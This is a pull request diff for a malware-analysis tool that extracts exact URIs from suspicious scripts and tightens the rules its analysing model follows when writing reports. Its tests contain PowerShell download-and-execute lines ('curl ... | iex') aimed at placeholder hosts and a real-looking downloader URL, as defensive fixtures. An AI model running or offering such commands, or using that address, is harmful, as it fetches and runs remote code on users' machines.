### PR TITLE
fix(analysis): render verified indicators and discipline report claims

### DIFF
--- a/src/orbit/runtime/analysis_indicators.py
+++ b/src/orbit/runtime/analysis_indicators.py
@@ -1,0 +1,186 @@
+"""Exact indicators, read from bytes Orbit already holds.
+
+An indicator is worth reporting only if it is right to the character. A model
+asked to repeat a 38-character URL from an evidence card it read several steps
+ago will occasionally get one character wrong -- and a hostname differing by
+one letter is not a weaker finding, it is a different finding that sends an
+analyst to the wrong place.
+
+So the runtime reads them instead. Everything here is a literal match over
+bytes that are already on disk: the acquired artifact, and the output of a
+deterministic transformation. Nothing is decoded here, nothing is fetched, and
+nothing is inferred -- what an address is *for* is the analysis's conclusion,
+and this file has no opinion about it.
+"""
+
+from __future__ import annotations
+
+import hashlib
+import re
+from dataclasses import dataclass
+
+# Absolute URIs, syntactically. Deliberately conservative about the closing
+# boundary: an artifact is attacker-written, and a URI in a script is normally
+# terminated by a quote, a pipe, whitespace or a closing bracket.
+_URI = re.compile(
+    r"\b[a-zA-Z][a-zA-Z0-9+.-]*://"
+    # A bracketed IPv6 authority may appear first; its brackets are part of
+    # the address rather than the punctuation that ends one.
+    r"(?:\[[0-9A-Fa-f:.]*\])?"
+    # Ends only at characters a URI cannot contain. `,` and `;` are legal --
+    # a comma separates query values and a semicolon introduces a path
+    # parameter -- so excluding them would silently shorten a real address
+    # into a plausible wrong one, and the digest beside it would then attest
+    # the truncation rather than the artifact.
+    r"[^\s\"'<>{}\\|^`]*"
+)
+
+# Enough to name a host, path and query without becoming a URL parser: the
+# authority runs to the first `/`, `?` or `#`.
+# The authority runs to the first `/`, `?` or `#`. A bracketed IPv6 literal is
+# matched as a unit first, because it legitimately contains the `:` that the
+# unbracketed form uses to introduce a port.
+_PARTS = re.compile(
+    r"^(?P<scheme>[^:]+)://(?P<authority>\[[^\]]*\](?::\d+)?|[^/?#]+)"
+    r"(?P<path>/[^?#]*)?(?P<query>\?[^#]*)?"
+)
+
+# A URI long enough to be an address rather than a fragment, short enough that
+# a pathological artifact cannot turn the report into a transcript.
+MAX_URI_CHARS = 2048
+MAX_INDICATORS = 32
+
+
+@dataclass(frozen=True)
+class Indicator:
+    """One exact string, and where in the evidence it was read from."""
+
+    kind: str
+    value: str
+    evidence_id: str
+    source: str
+    line: int
+    sha256: str
+
+    @property
+    def authority(self) -> str | None:
+        """Everything between `://` and the path.
+
+        Named `authority` rather than `host` because that is what it is: any
+        userinfo and any port are part of it, and silently dropping them would
+        report a different address from the one in the artifact. Splitting
+        them out correctly means parsing URIs properly, which is more than an
+        exact-string reader should take on -- so it reports the span verbatim.
+        """
+        match = _PARTS.match(self.value)
+        return match.group("authority") if match else None
+
+    @property
+    def path(self) -> str | None:
+        match = _PARTS.match(self.value)
+        return (match.group("path") or "") if match else None
+
+    @property
+    def query(self) -> str | None:
+        match = _PARTS.match(self.value)
+        return (match.group("query") or "") if match else None
+
+
+def _sha(text: str) -> str:
+    return hashlib.sha256(text.encode("utf-8", "surrogatepass")).hexdigest()
+
+
+def uris_in(text: str) -> list[str]:
+    """Absolute URIs in `text`, first-seen order, deduplicated.
+
+    A trailing `.` or `)` is stripped, because prose and scripts alike end a
+    sentence or close a call right after an address, and those characters are
+    far more often punctuation than part of the URI.
+    """
+    found: list[str] = []
+    for candidate in _URI.findall(text):
+        # Only characters that end a sentence rather than an address, and only
+        # at the very end. A comma or semicolon *inside* a URI is part of the
+        # value -- a query separator, a path parameter -- so the character
+        # class above keeps them; one in final position is prose far more
+        # often than address, and is dropped here. The distinction is the
+        # position, which is why this is a strip and not an exclusion.
+        trimmed = candidate.rstrip(".,;:)")
+        if not trimmed or len(trimmed) > MAX_URI_CHARS:
+            continue
+        if not _PARTS.match(trimmed):
+            continue
+        if trimmed not in found:
+            found.append(trimmed)
+    return found
+
+
+def extract_indicators(
+    sources: "list[tuple[str, str, str]]",
+) -> list[Indicator]:
+    """Exact indicators across `(label, evidence_id, text)` sources.
+
+    Deduplicated by value, keeping the first source that carried it: the same
+    address written twice is one indicator, and naming every place it appears
+    would pad the report without adding a fact.
+    """
+    indicators: list[Indicator] = []
+    seen: set[str] = set()
+    for label, evidence_id, text in sources:
+        if not isinstance(text, str):
+            continue
+        for value in uris_in(text):
+            if value in seen:
+                continue
+            seen.add(value)
+            indicators.append(
+                Indicator(
+                    kind="uri",
+                    value=value,
+                    evidence_id=evidence_id,
+                    source=label,
+                    line=text[: text.index(value)].count("\n") + 1,
+                    sha256=_sha(value),
+                )
+            )
+            if len(indicators) >= MAX_INDICATORS:
+                return indicators
+    return indicators
+
+
+def render_indicators(indicators: "list[Indicator]") -> str:
+    """The report section. Empty when nothing exact was found.
+
+    Renders what the bytes say and nothing else. There is no `C2`, no
+    `malicious`, no severity: an address recovered from an artifact is an
+    address recovered from an artifact, and deciding what it means is the
+    analysis's job, on the evidence, in its own words.
+    """
+    if not indicators:
+        return ""
+    lines = ["## Verified indicators", ""]
+    for indicator in indicators:
+        lines.append(f"- {indicator.kind}: {indicator.value}")
+        authority = indicator.authority
+        if authority:
+            lines.append(f"  authority: {authority}")
+        if indicator.path:
+            lines.append(f"  path: {indicator.path}")
+        if indicator.query:
+            lines.append(f"  query: {indicator.query}")
+        # An artifact reading is named by digest, not by an evidence id, and
+        # the two are kept in different slots: the report instruction tells
+        # the model to cite `evidence:<id>`, and a digest offered in that slot
+        # invites a citation that would never resolve.
+        if indicator.evidence_id.startswith("sha256:"):
+            lines.append(
+                f"  artifact: {indicator.evidence_id} "
+                f"({indicator.source}, line {indicator.line})"
+            )
+        else:
+            lines.append(
+                f"  evidence: {indicator.evidence_id} "
+                f"({indicator.source}, line {indicator.line})"
+            )
+        lines.append(f"  sha256: {indicator.sha256}")
+    return "\n".join(lines)

--- a/src/orbit/runtime/analysis_runtime.py
+++ b/src/orbit/runtime/analysis_runtime.py
@@ -45,6 +45,7 @@ from orbit.runtime.context_manager import (
     plan_exact_context,
 )
 from orbit.runtime.analysis_deobfuscate import TransformStage, deobfuscate
+from orbit.runtime.analysis_indicators import extract_indicators, render_indicators
 from orbit.runtime.analysis_progress import (
     COMPLETE,
     ERROR,
@@ -165,6 +166,18 @@ ANALYSIS_REPORT_INSTRUCTION = (
     "Cover, briefly and only where the evidence supports it: confirmed "
     "findings; indicators; artifacts produced; behaviour established; what "
     "remains unresolved; and the single next step most worth taking."
+    "\nName a behaviour only when the evidence shows it: repeated or "
+    "call-back contact before calling something beaconing, and a mechanism "
+    "for future or recurrent execution before calling something persistence "
+    "-- writing or copying a file is staging until something makes it run "
+    "again, unless where it is written is itself what runs it. Describe "
+    "timing and file deletion as what they do; call them "
+    "evasion or anti-forensic only where a purpose is evidenced. Prefer a "
+    "plain description to a technique label when intent is not established.\n"
+    "This analysis is offline and isolated: the next step must be one that "
+    "can be taken here, on the artifact and the evidence. Retrieving a "
+    "remote resource is not that step, though it may be named as separately "
+    "authorised follow-up."
 )
 
 NO_EVIDENCE_REPORT = "No analysis evidence has been collected yet."
@@ -769,6 +782,51 @@ def _rejected_action_text(assistant_text: str, rejection: str) -> str:
     return f"{text}\n\n{note}" if text else note
 
 
+def _decoded_views(raw: bytes) -> "list[tuple[str, str]]":
+    """Readings of the artifact an exact indicator may be found in.
+
+    Strict UTF-8 first, and only strict: decoding with `errors="replace"`
+    would put U+FFFD into a string this then calls verified, and a character
+    that is not in the artifact must never appear in an indicator -- the
+    digest beside it would attest the corruption.
+
+    When the bytes are not UTF-8 they are read as UTF-16, in both byte
+    orders, because an address embedded in a UTF-16 artifact is exact too and
+    would otherwise be silently invisible rather than merely unread. Each
+    reading is labelled, so provenance says which one produced a value.
+
+    A file that decodes cleanly under none of them yields nothing. That is
+    the honest answer: this reads text, and those bytes are not text it can
+    read.
+    """
+    if not raw:
+        return []
+    views: list[tuple[str, str]] = []
+    try:
+        decoded = raw.decode("utf-8")
+    except UnicodeDecodeError:
+        decoded = None
+    # UTF-16 text is valid UTF-8 whenever every character is ASCII -- each
+    # one becomes a byte plus a NUL -- so the strict decode succeeds and
+    # yields `h\x00t\x00t\x00p`, in which no URI can be found. An embedded
+    # NUL is what distinguishes that from real UTF-8 text.
+    if decoded is not None and "\x00" not in decoded:
+        views.append(("artifact", decoded))
+    else:
+        for label, encoding in (("artifact utf-16le", "utf-16-le"),
+                                ("artifact utf-16be", "utf-16-be")):
+            try:
+                decoded = raw.decode(encoding)
+            except UnicodeDecodeError:
+                continue
+            # A UTF-16 reading of ordinary 8-bit text succeeds but produces
+            # CJK noise; requiring the reading to contain a scheme separator
+            # keeps a spurious view from being searched at all.
+            if "://" in decoded:
+                views.append((label, decoded))
+    return views
+
+
 def _is_locally_repairable(step: "AnalysisStepResult") -> bool:
     """Whether one step failed in a way its own author could plausibly fix.
 
@@ -960,6 +1018,51 @@ class AnalysisRuntime:
             self.messages.append(
                 {"role": "user", "content": _transform_preamble(self.transform_stages)}
             )
+
+    def deterministic_sections(self) -> str:
+        """Everything the runtime renders exactly, in reading order.
+
+        Indicators first: they are the shortest, the most often acted on, and
+        the most costly to get wrong. The transformation appendix follows,
+        showing the work the indicators may have come from.
+        """
+        return "\n\n".join(
+            section
+            for section in (self.verified_indicators(), self.transform_appendix())
+            if section
+        )
+
+    def verified_indicators(self) -> str:
+        """Exact indicators the runtime can read, rendered for the report.
+
+        Sourced from the artifact snapshot and from every deterministic stage,
+        because an address may be written plainly or may only appear once a
+        transformation has run, and both are equally exact once they exist.
+
+        This is the same argument as the transform appendix: a value the
+        runtime can read to the character should not depend on a model
+        retyping it from an evidence card several steps back. A hostname
+        differing by one letter is not a weaker finding -- it is a different
+        finding, and it sends an analyst somewhere else.
+
+        Nothing is fetched and nothing is labelled. What an address is for is
+        the analysis's conclusion, not this method's.
+        """
+        sources: list[tuple[str, str, str]] = []
+        # The artifact snapshot first, so a plainly written address keeps the
+        # plainest provenance: the session's own pinned copy, named by its
+        # digest. Read from the snapshot rather than from an evidence record
+        # because the artifact is not stored as evidence -- the snapshot IS
+        # the durable, hash-identified copy the whole session is bound to.
+        try:
+            raw = self.source.snapshot_path.read_bytes()
+        except OSError:
+            raw = b""
+        for label, text in _decoded_views(raw):
+            sources.append((label, f"sha256:{self.source.sha256}", text))
+        for stage, record in self.transform_stages:
+            sources.append((stage.kind, record.evidence_id, stage.output))
+        return render_indicators(extract_indicators(sources))
 
     def transform_appendix(self) -> str:
         """Exact rendering of the deterministic stages. No model involved.
@@ -2204,7 +2307,7 @@ class AnalysisRuntime:
         report is not evidence: the prose it produces is an answer about the
         record, never part of it.
         """
-        appendix = self.transform_appendix()
+        appendix = self.deterministic_sections()
         records = self._reportable_records()
         if not records:
             # Deterministic, and free: there is nothing to ground a report in,

--- a/src/orbit/terminal/repl.py
+++ b/src/orbit/terminal/repl.py
@@ -520,7 +520,7 @@ class Repl:
                 # computes it, attests it, and never tells anyone. Sanitized
                 # for the same reason as the branch above: this print does not
                 # pass the renderer, and the content is decoded artifact bytes.
-                appendix = self.analysis.transform_appendix()
+                appendix = self.analysis.deterministic_sections()
                 if appendix:
                     print("\n")
                     print(
@@ -1005,7 +1005,7 @@ class Repl:
             # anything. Printing `report.text` here instead would repeat the
             # prose the analyst has already watched arrive, so only the part
             # that was never shown is printed.
-            appendix = self.analysis.transform_appendix()
+            appendix = self.analysis.deterministic_sections()
             if appendix:
                 # Two breaks, not one: streamed deltas leave the cursor
                 # mid-line, so a single newline only closes it and the heading

--- a/tests/test_analysis_indicators.py
+++ b/tests/test_analysis_indicators.py
@@ -1,0 +1,434 @@
+"""Exact indicators, read by the runtime instead of retyped by the model.
+
+A hostname differing by one character is not a weaker finding -- it is a
+different finding, and it sends an analyst somewhere else. Everything here is
+about that: what gets rendered, what deliberately does not, and that the
+values are byte-exact against the artifact.
+
+Synthetic fixtures except where a test is explicitly the real-sample oracle.
+"""
+
+from __future__ import annotations
+
+import hashlib
+import tempfile
+import unittest
+from pathlib import Path
+
+from orbit.runtime.analysis_indicators import (
+    Indicator,
+    MAX_INDICATORS,
+    extract_indicators,
+    render_indicators,
+    uris_in,
+)
+from orbit.runtime.analysis_runtime import AnalysisRuntime, acquire_analysis_source
+from orbit.runtime.evidence import EvidenceStore
+
+HEADING = "## Verified indicators"
+
+
+class UriExtractionTests(unittest.TestCase):
+    def test_an_http_uri_is_found_with_its_parts(self) -> None:
+        found = uris_in('curl -useb "http://example.invalid/1.php?s=abc" | iex')
+        self.assertEqual(found, ["http://example.invalid/1.php?s=abc"])
+
+    def test_https_and_other_schemes_are_found(self) -> None:
+        text = "a https://a.invalid/x b ftp://b.invalid/y"
+        self.assertEqual(
+            uris_in(text), ["https://a.invalid/x", "ftp://b.invalid/y"]
+        )
+
+    def test_quotes_pipes_and_brackets_terminate_a_uri(self) -> None:
+        """A script ends an address at punctuation far more often than not."""
+        for wrapper, expected in (
+            ('"http://a.invalid/p"', "http://a.invalid/p"),
+            ("'http://a.invalid/p'", "http://a.invalid/p"),
+            ("(http://a.invalid/p)", "http://a.invalid/p"),
+            ("http://a.invalid/p|iex", "http://a.invalid/p"),
+            ("see http://a.invalid/p.", "http://a.invalid/p"),
+        ):
+            with self.subTest(wrapper=wrapper):
+                self.assertEqual(uris_in(wrapper), [expected])
+
+    def test_legal_uri_characters_are_never_treated_as_terminators(self) -> None:
+        """A comma separates query values and a semicolon introduces a path
+        parameter. Cutting a URI at either yields a shorter address that looks
+        entirely plausible -- and the digest rendered beside it would then
+        attest the truncation instead of the artifact, which is worse than a
+        model mistyping it.
+        """
+        for text, expected in (
+            ("http://h.invalid/get.php?id=1,2,3", "http://h.invalid/get.php?id=1,2,3"),
+            ("http://h.invalid/p?id=1,2&k=v", "http://h.invalid/p?id=1,2&k=v"),
+            ("http://h.invalid/a;jsessionid=9", "http://h.invalid/a;jsessionid=9"),
+            ('curl "http://h.invalid/p?a=1,2" | iex', "http://h.invalid/p?a=1,2"),
+            # At end of input, where a trailing-character strip would bite.
+            ("http://h.invalid/p?a=1,2", "http://h.invalid/p?a=1,2"),
+            ("http://h.invalid/a;b", "http://h.invalid/a;b"),
+            ("http://h.invalid/p?a=1:2", "http://h.invalid/p?a=1:2"),
+        ):
+            with self.subTest(text=text):
+                self.assertEqual(uris_in(text), [expected])
+
+    def test_trailing_punctuation_is_prose_not_address(self) -> None:
+        """Position decides. A comma inside a URI is a query separator and is
+        kept; the same character in final position is almost always the
+        sentence, not the address."""
+        for text, expected in (
+            ("go to http://h.invalid/p, then stop", "http://h.invalid/p"),
+            ("http://h.invalid/p;", "http://h.invalid/p"),
+            ("see http://h.invalid/p.", "http://h.invalid/p"),
+            ("(http://h.invalid/p)", "http://h.invalid/p"),
+        ):
+            with self.subTest(text=text):
+                self.assertEqual(uris_in(text), [expected])
+
+    def test_a_repeated_uri_is_reported_once(self) -> None:
+        text = "http://a.invalid/x and again http://a.invalid/x"
+        self.assertEqual(uris_in(text), ["http://a.invalid/x"])
+
+    def test_text_without_a_uri_yields_nothing(self) -> None:
+        self.assertEqual(uris_in("Remove-Item $env:APPDATA\\*.ps1 -Force"), [])
+
+    def test_a_bare_hostname_is_not_a_uri(self) -> None:
+        """No scheme, no indicator: guessing one would invent a fact."""
+        self.assertEqual(uris_in("connect to example.invalid/path"), [])
+
+
+class IndicatorProvenanceTests(unittest.TestCase):
+    def test_each_indicator_carries_its_source_and_digest(self) -> None:
+        text = 'line one\ncurl "http://a.invalid/1.php?s=k"\n'
+        indicator = extract_indicators([("artifact", "ev_1", text)])[0]
+
+        self.assertEqual(indicator.value, "http://a.invalid/1.php?s=k")
+        self.assertEqual(indicator.authority, "a.invalid")
+        self.assertEqual(indicator.path, "/1.php")
+        self.assertEqual(indicator.query, "?s=k")
+        self.assertEqual(indicator.evidence_id, "ev_1")
+        self.assertEqual(indicator.source, "artifact")
+        self.assertEqual(indicator.line, 2)
+        self.assertEqual(
+            indicator.sha256, hashlib.sha256(indicator.value.encode()).hexdigest()
+        )
+
+    def test_the_first_source_carrying_a_value_keeps_it(self) -> None:
+        """The same address twice is one indicator, not two."""
+        indicators = extract_indicators(
+            [
+                ("artifact", "ev_1", "http://a.invalid/x"),
+                ("jscript_numeric_xor", "ev_2", "http://a.invalid/x"),
+            ]
+        )
+        self.assertEqual(len(indicators), 1)
+        self.assertEqual(indicators[0].source, "artifact")
+
+    def test_a_decoded_stage_can_be_the_source(self) -> None:
+        indicators = extract_indicators(
+            [("artifact", "ev_1", "no address here"),
+             ("powershell_numeric_xor", "ev_2", "http://b.invalid/y")]
+        )
+        self.assertEqual(indicators[0].source, "powershell_numeric_xor")
+        self.assertEqual(indicators[0].evidence_id, "ev_2")
+
+    def test_the_indicator_count_is_bounded(self) -> None:
+        """The bound is pinned by value, not by reference to itself: asserting
+        the result equals the constant passes for any constant, including one
+        large enough to turn a report into a transcript."""
+        self.assertEqual(MAX_INDICATORS, 32)
+        text = "\n".join(f"http://h{i}.invalid/p" for i in range(MAX_INDICATORS * 3))
+        self.assertEqual(len(extract_indicators([("artifact", "ev", text)])), 32)
+
+
+class RenderingTests(unittest.TestCase):
+    def _render(self, text: str) -> str:
+        return render_indicators(extract_indicators([("artifact", "ev_1", text)]))
+
+    def test_nothing_is_rendered_when_nothing_is_exact(self) -> None:
+        self.assertEqual(self._render("no address in here"), "")
+        self.assertEqual(render_indicators([]), "")
+
+    def test_the_value_is_rendered_verbatim(self) -> None:
+        rendered = self._render('curl "http://a.invalid/1.php?s=k"')
+        self.assertIn("http://a.invalid/1.php?s=k", rendered)
+        self.assertIn(HEADING, rendered)
+        self.assertIn("authority: a.invalid", rendered)
+        self.assertIn("path: /1.php", rendered)
+        self.assertIn("query: ?s=k", rendered)
+        self.assertIn("evidence: ev_1", rendered)
+
+    def test_nothing_is_labelled(self) -> None:
+        """What an address is for is the analysis's conclusion, not this."""
+        rendered = self._render("http://a.invalid/x").lower()
+        for word in ("c2", "command and control", "malicious", "beacon",
+                     "payload", "attacker", "threat"):
+            with self.subTest(word=word):
+                self.assertNotIn(word, rendered)
+
+    def test_the_digest_reaches_the_rendered_section(self) -> None:
+        """It is the field an analyst would use to confirm the value."""
+        import hashlib
+
+        value = "http://a.invalid/1.php?s=k"
+        rendered = self._render(f'curl "{value}"')
+        self.assertIn(hashlib.sha256(value.encode()).hexdigest(), rendered)
+
+    def test_an_artifact_reading_is_not_offered_as_an_evidence_id(self) -> None:
+        """The report instruction says to cite `evidence:<id>`; a digest in
+        that slot invites a citation that would never resolve."""
+        indicators = extract_indicators([("artifact", "sha256:abc", "http://a.invalid/x")])
+        text = render_indicators(indicators)
+        self.assertIn("artifact: sha256:abc", text)
+        self.assertNotIn("evidence: sha256:", text)
+
+    def test_a_store_backed_indicator_keeps_the_evidence_label(self) -> None:
+        text = render_indicators(
+            extract_indicators([("powershell_numeric_xor", "ev_9", "http://a.invalid/x")])
+        )
+        self.assertIn("evidence: ev_9", text)
+
+    def test_a_trailing_slash_is_part_of_the_address(self) -> None:
+        self.assertEqual(uris_in("http://a.invalid/"), ["http://a.invalid/"])
+
+    def test_a_uri_without_a_path_renders_without_empty_fields(self) -> None:
+        rendered = self._render("http://a.invalid")
+        self.assertIn("authority: a.invalid", rendered)
+        self.assertNotIn("path:", rendered)
+        self.assertNotIn("query:", rendered)
+
+
+class RuntimeIntegrationTests(unittest.TestCase):
+    def _runtime(self, text: str) -> AnalysisRuntime:
+        tmpdir = tempfile.TemporaryDirectory(prefix="orbit-ioc-")
+        self.addCleanup(tmpdir.cleanup)
+        tmp = Path(tmpdir.name)
+        artifact = tmp / "artifact.ps1"
+        artifact.write_text(text, encoding="utf-8")
+        runtime = AnalysisRuntime(
+            backend=None,
+            source=acquire_analysis_source(artifact, tmp / "owned"),
+            evidence_store=EvidenceStore(root=tmp / "evidence"),
+        )
+        self.addCleanup(runtime.close)
+        return runtime
+
+    def test_a_plain_literal_uri_is_recovered_from_the_artifact(self) -> None:
+        runtime = self._runtime('curl -useb "http://a.invalid/1.php?s=k" | iex\n')
+        rendered = runtime.verified_indicators()
+
+        self.assertIn("http://a.invalid/1.php?s=k", rendered)
+        # Provenance is the session's pinned snapshot, named by its digest.
+        self.assertIn(f"sha256:{runtime.source.sha256}", rendered)
+
+    def test_an_artifact_without_a_uri_renders_nothing(self) -> None:
+        runtime = self._runtime("Remove-Item $env:APPDATA\\*.ps1 -Force\n")
+        self.assertEqual(runtime.verified_indicators(), "")
+        self.assertEqual(runtime.deterministic_sections(), "")
+
+    def test_indicators_precede_the_transformation_appendix(self) -> None:
+        """Shortest and most often acted on first; the work that produced it
+        after."""
+        decoder = (
+            "function dec(s, k, d) {\n"
+            "    var out = '';\n"
+            "    var parts = s.split(d);\n"
+            "    for (var i = 0; i < parts.length; i++) {\n"
+            "        out += String.fromCharCode(parts[i] ^ k);\n"
+            "    }\n"
+            "    return out;\n"
+            "}\n"
+        )
+        uri = "http://a.invalid/decoded"
+        encoded = ",".join(str(ord(c) ^ 7) for c in uri)
+        runtime = self._runtime(decoder + f'dec("{encoded}", 7, ",");\n')
+
+        sections = runtime.deterministic_sections()
+        self.assertIn(HEADING, sections)
+        self.assertIn("## Deterministic transformations", sections)
+        self.assertLess(
+            sections.index(HEADING),
+            sections.index("## Deterministic transformations"),
+        )
+        self.assertIn(uri, sections)
+
+    def test_rendering_mutates_nothing(self) -> None:
+        runtime = self._runtime('curl "http://a.invalid/x"\n')
+        before = set(runtime.evidence_store.records)
+        runtime.verified_indicators()
+        runtime.deterministic_sections()
+        self.assertEqual(set(runtime.evidence_store.records), before)
+
+
+class ArtifactEncodingTests(unittest.TestCase):
+    """Which readings of an artifact may produce a "verified" value."""
+
+    def _views(self, raw: bytes):
+        from orbit.runtime.analysis_runtime import _decoded_views
+
+        return _decoded_views(raw)
+
+    def test_utf8_text_is_read(self) -> None:
+        views = self._views(b"curl http://a.invalid/p")
+        self.assertEqual([label for label, _ in views], ["artifact"])
+
+    def test_undecodable_bytes_produce_nothing_rather_than_mojibake(self) -> None:
+        """`errors="replace"` would put U+FFFD into a string this calls
+        verified, and the digest beside it would attest the corruption."""
+        raw = "caf\u00e9 http://a.invalid/p".encode("latin-1")
+        self.assertEqual(self._views(raw), [])
+        for _label, text in self._views(raw):
+            self.assertNotIn("\ufffd", text)
+
+    def test_utf16_text_is_read_in_both_byte_orders(self) -> None:
+        """An address in a UTF-16 artifact is exact too; missing it silently
+        is worse than saying nothing, because the section simply disappears."""
+        for encoding, expected in (("utf-16-le", "artifact utf-16le"),
+                                   ("utf-16-be", "artifact utf-16be")):
+            with self.subTest(encoding=encoding):
+                raw = "x http://evil.invalid/p".encode(encoding)
+                views = self._views(raw)
+                self.assertEqual([label for label, _ in views], [expected])
+                self.assertIn("http://evil.invalid/p", views[0][1])
+
+    def test_binary_bytes_produce_nothing(self) -> None:
+        self.assertEqual(self._views(bytes(range(256))), [])
+
+    def test_empty_bytes_produce_nothing(self) -> None:
+        self.assertEqual(self._views(b""), [])
+
+    def test_the_reading_is_named_in_the_provenance(self) -> None:
+        raw = "x http://evil.invalid/p".encode("utf-16-le")
+        indicators = extract_indicators(
+            [(label, "sha256:abc", text) for label, text in self._views(raw)]
+        )
+        self.assertEqual(indicators[0].source, "artifact utf-16le")
+
+
+class ReportContractTests(unittest.TestCase):
+    """The narrow discipline added to the reporting instruction."""
+
+    def _instruction(self) -> str:
+        from orbit.runtime.analysis_runtime import ANALYSIS_REPORT_INSTRUCTION
+
+        return ANALYSIS_REPORT_INSTRUCTION.lower()
+
+    def test_beaconing_requires_repeated_or_callback_contact(self) -> None:
+        """The condition, not merely the word: a contract that mentions
+        beaconing without saying what earns it licenses the overclaim it is
+        supposed to prevent."""
+        text = self._instruction()
+        self.assertIn("name a behaviour only when the evidence shows it", text)
+        self.assertIn("repeated or call-back contact", text)
+        self.assertIn("before calling something beaconing", text)
+
+    def test_persistence_requires_recurrent_execution(self) -> None:
+        text = self._instruction()
+        self.assertIn("persistence", text)
+        self.assertIn("future or recurrent execution", text)
+
+    def test_staging_is_distinguished_from_persistence(self) -> None:
+        self.assertIn("staging until something makes it run again", self._instruction())
+
+    def test_timing_and_deletion_are_described_factually(self) -> None:
+        text = self._instruction()
+        self.assertIn("describe timing and file deletion as what they do", text)
+        self.assertIn("only where a purpose is evidenced", text)
+
+    def test_the_next_step_must_be_locally_actionable(self) -> None:
+        text = self._instruction()
+        self.assertIn("offline and isolated", text)
+        self.assertIn("retrieving a remote resource is not that step", text)
+
+    def test_the_contract_names_no_artifact_or_technique(self) -> None:
+        """General discipline, not knowledge of any sample."""
+        text = self._instruction()
+        for term in ("powershell", "curl", "gibuzuy", "smartmaket",
+                     "xor", "base64", ".ps1", "mints13"):
+            with self.subTest(term=term):
+                self.assertNotIn(term, text)
+
+
+class GenericityTests(unittest.TestCase):
+    """No knowledge of any particular artifact may live in production."""
+
+    SAMPLE_TERMS = (
+        "gibuzuy", "gibuyuy", "mints13", "peXF7I6W", "smartmaket", "AA1789FF",
+    )
+
+    def test_production_contains_no_sample_indicator(self) -> None:
+        root = Path(__file__).resolve().parents[1] / "src" / "orbit"
+        for path in root.rglob("*.py"):
+            text = path.read_text(encoding="utf-8", errors="replace")
+            for term in self.SAMPLE_TERMS:
+                with self.subTest(path=path.name, term=term):
+                    self.assertNotIn(term, text)
+
+    def test_extraction_has_no_network_or_execution_primitive(self) -> None:
+        import orbit.runtime.analysis_indicators as module
+
+        text = Path(module.__file__).read_text(encoding="utf-8")
+        for token in ("urllib", "requests", "socket", "http.client",
+                      "eval(", "exec(", "subprocess", "__import__"):
+            with self.subTest(token=token):
+                self.assertNotIn(token, text)
+
+
+class RealSampleOracleTests(unittest.TestCase):
+    """The pinned PowerShell artifact, with no model involved."""
+
+    SAMPLE = Path(__file__).resolve().parents[1] / "workdir" / "samples" / "peXF7I6W.ps1"
+    SAMPLE_SHA = "5eba3e4538cffbde5d39ba81eb4ed85e9c9cc6065e036503073a43a9478f405d"
+    # Byte-exact, derived from the artifact; asserted here so a transcription
+    # error anywhere in the rendering path fails loudly.
+    URI = "http://gibuzuy37v2v.top/1.php?s=mints13"
+    HOST = "gibuzuy37v2v.top"
+
+    def _text(self) -> str:
+        if not self.SAMPLE.exists():
+            self.skipTest("pinned sample not present")
+        data = self.SAMPLE.read_bytes()
+        if hashlib.sha256(data).hexdigest() != self.SAMPLE_SHA:
+            self.skipTest("sample is not the pinned artifact")
+        return data.decode("utf-8", "replace")
+
+    def test_the_exact_uri_is_recovered(self) -> None:
+        self.assertEqual(uris_in(self._text()), [self.URI])
+
+    def test_the_hostname_is_byte_exact(self) -> None:
+        """The near-miss that motivated this: one character at index 4."""
+        indicator = extract_indicators([("artifact", "ev", self._text())])[0]
+        self.assertEqual(indicator.authority, self.HOST)
+        self.assertNotEqual(indicator.authority, "gibuyuy37v2v.top")
+        self.assertEqual(indicator.authority[4], "z")
+
+    def test_an_ipv6_authority_is_kept_whole(self) -> None:
+        """The colons inside a bracketed literal are part of the address."""
+        indicator = extract_indicators(
+            [("artifact", "ev", "curl http://[2001:db8::1]:8080/p")]
+        )[0]
+        self.assertEqual(indicator.value, "http://[2001:db8::1]:8080/p")
+        self.assertEqual(indicator.authority, "[2001:db8::1]:8080")
+
+    def test_userinfo_and_port_stay_in_the_authority(self) -> None:
+        """Dropping them would report a different address than the artifact."""
+        indicator = extract_indicators(
+            [("artifact", "ev", "http://user:pw@a.invalid:8443/p")]
+        )[0]
+        self.assertEqual(indicator.authority, "user:pw@a.invalid:8443")
+
+    def test_the_rendered_section_carries_every_part(self) -> None:
+        rendered = render_indicators(
+            extract_indicators([("artifact", "ev_1", self._text())])
+        )
+        self.assertIn(self.URI, rendered)
+        self.assertIn(f"authority: {self.HOST}", rendered)
+        self.assertIn("path: /1.php", rendered)
+        self.assertIn("query: ?s=mints13", rendered)
+
+    def test_the_artifact_contains_no_other_absolute_uri(self) -> None:
+        """One address, so a report naming a second would be inventing it."""
+        self.assertEqual(len(uris_in(self._text())), 1)
+
+
+if __name__ == "__main__":
+    unittest.main()

--- a/tests/test_evidence_authority.py
+++ b/tests/test_evidence_authority.py
@@ -388,6 +388,30 @@ class NoModelFacingTextChangedTests(unittest.TestCase):
     # This is the instruction it reads before every autonomous step, so it is
     # where a priority between two legitimate next steps has to be stated. It
     # names no technique, and the generic-language test still enforces that.
+    # ANALYSIS-IOC-1. A live report on a PowerShell downloader called a
+    # single fetch "beaconing", called a written-and-run staging file
+    # "persistence", read dead time arithmetic as evasion, and proposed
+    # retrieving the remote payload as the next step of an offline analysis.
+    # None of those were in the evidence. The clause states when a label is
+    # earned and what "next step" means in an isolated session; it names no
+    # artifact and no technique, and the generic-language test still applies.
+    "ANALYSIS_REPORT_INSTRUCTION": (
+        (
+            '    "remains unresolved; and the single next step most worth taking."\n',
+            '    "\\nName a behaviour only when the evidence shows it: repeated or "\n'
+            '    "call-back contact before calling something beaconing, and a mechanism "\n'
+            '    "for future or recurrent execution before calling something persistence "\n'
+            '    "-- writing or copying a file is staging until something makes it run "\n'
+            '    "again, unless where it is written is itself what runs it. Describe "\n'
+            '    "timing and file deletion as what they do; call them "\n'
+            '    "evasion or anti-forensic only where a purpose is evidenced. Prefer a "\n'
+            '    "plain description to a technique label when intent is not established.\\n"\n'
+            '    "This analysis is offline and isolated: the next step must be one that "\n'
+            '    "can be taken here, on the artifact and the evidence. Retrieving a "\n'
+            '    "remote resource is not that step, though it may be named as separately "\n'
+            '    "authorised follow-up."\n',
+        ),
+    ),
     "AUTONOMOUS_CONTINUATION_MESSAGE": (
         (
             '    "findings."\n',


### PR DESCRIPTION
